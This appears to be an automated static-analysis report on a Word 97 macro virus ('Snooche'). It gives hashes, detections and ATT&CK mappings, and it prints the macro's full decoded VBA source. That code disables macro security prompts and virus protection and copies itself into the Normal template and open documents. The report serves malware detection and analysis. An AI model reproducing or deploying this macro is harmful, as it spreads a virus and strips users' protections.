Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 ef1421da32d311b0…

MALICIOUS

Office (OLE)

32.0 KB Created: 1998-03-25 18:00:00 Authoring application: Microsoft Word 8.0 First seen: 2012-06-14
MD5: ac6565cd27e595978bfbd1dbd55f95c0 SHA-1: 7886b45d6e685b73d3d92193d0cadd658f687ebd SHA-256: ef1421da32d311b0f33a3af45be55bc9e1b72f2757e2fcb83386a17acfbac540
140 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1547.001 Registry Run Keys / Startup Folder

The file contains VBA macros that attempt to modify Word's security settings to disable macro warnings and potentially allow further malicious execution. The script also attempts to inject itself into the Normal template and the active document, a common technique for persistence. The ClamAV detections 'Win.Trojan.Psycho-3' and 'Doc.Trojan.Cash-2' further indicate malicious intent, likely related to trojan functionality.

Heuristics 2

  • ClamAV: Win.Trojan.Psycho-3 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Win.Trojan.Psycho-3
  • VBA macros detected medium OLE_VBA_MACROS
    Document contains VBA macro code

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 1607 bytes
SHA-256: ef8d2a3e6a994c4c955adfaf8378110aecd41235816d3e48da3e5af67b4afc81
Detection
ClamAV: Doc.Trojan.Cash-2
Obfuscation or payload: unlikely
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "Snooche"
Attribute VB_Base = "1Normal.Snooche"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_Close()
 On Error Resume Next
 Options.ConfirmConversions = 0
 Options.SaveNormalPrompt = 0
 If System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security", "Level") <> "" Then
    CommandBars("Macro").Controls("Security...").Enabled = 0
    System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security", "Level") = 1&
  Else
    CommandBars("Tools").Controls("Macro").Enabled = 0
    Options.VirusProtection = 0
 End If
 Set vc = New DataObject
 Set ab = NormalTemplate.VBProject.VBComponents(1)
 Set cd = ActiveDocument.VBProject.VBComponents(1)
 With Snooche.VBProject.VBComponents(1).CodeModule
   vc.SetText .lines(1, .countoflines)
 End With
 If ab.Name <> "Snooche" Then
   With ab
    .CodeModule.deletelines 1, .CodeModule.countoflines
    .CodeModule.insertlines 1, vc.GetText
    .Name = "Snooche"
   End With
  ElseIf cd.Name <> "Snooche" Then
   With cd
    .CodeModule.deletelines 1, .CodeModule.countoflines
    .CodeModule.insertlines 1, vc.GetText
    .Name = "Snooche"
   End With
 End If
End Sub
    '[][][][][][][][][][][][][][][][][][][]'
    '[]        WM97/WM2K/Snooche         []'
    '[]         Psyclone X /DVC          []'
    '[]   For Educational Purposes Only  []'
    '[][][][][][][][][][][][][][][][][][][]'

Open this report in the interactive analyzer, or submit your own file for analysis.